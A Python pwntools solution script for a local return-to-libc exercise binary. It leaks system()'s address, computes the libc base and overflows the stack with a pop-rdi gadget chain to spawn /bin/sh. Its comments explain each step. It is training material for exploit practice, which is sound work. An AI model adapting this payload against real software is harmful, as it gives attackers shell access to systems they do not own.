from pwn import *

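# Solution script for the local exercise binary ./rop_easy (return-to-libc).
#
# Every constant below is tied to one specific build. The two libc offsets
# must match the exact libc the target process loads, and the gadget address
# must match this exact binary. With a different libc the computed base is
# wrong; a base that is not page-aligned is the usual sign of that mismatch.
system_offset = 0x45390   # offset of system() from the libc load base
bin_sh_offset = 0x18cd57  # offset of the "/bin/sh" string from the libc load base
# Absolute address inside the binary, so the binary is presumably non-PIE.
# It is used to load the following stack word as system()'s first argument,
# presumably a `pop rdi; ret` gadget (confirm against the binary).
pop_ret = 0x400753

r = process('./rop_easy')

# The target prints the runtime address of system(). That disclosure is what
# defeats ASLR here: one known libc pointer fixes the whole libc mapping.
# Bytes literals keep the tube I/O valid on Python 3 as well as Python 2.
r.recvuntil(b'system leak plz:')
sys_leak = r.recvline().strip()
log.info("found leak for system: %s" % sys_leak.decode('ascii', 'replace'))

# int() raises ValueError if the leak line is not a hex number, which is the
# desired failure mode: continuing with a wrong base would only crash the target.
sys_addr = int(sys_leak, 16)
libc_base = sys_addr - system_offset

log.success("found libc base!: 0x%x" % libc_base)

# Stack layout written over the saved return address:
#   40 filler bytes | gadget | pointer to "/bin/sh" | system()
# The filler length comes from the target's stack frame and cannot be derived
# from this script. The payload does nothing about a stack canary, so the
# target was presumably built without one.
# The filler is bytes because p64() returns bytes; the original str filler
# raised TypeError on the first `+=` under Python 3.
payload = b'A' * 40
payload += p64(pop_ret)
payload += p64(libc_base + bin_sh_offset)
payload += p64(libc_base + system_offset)

r.sendline(payload)

r.interactive()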
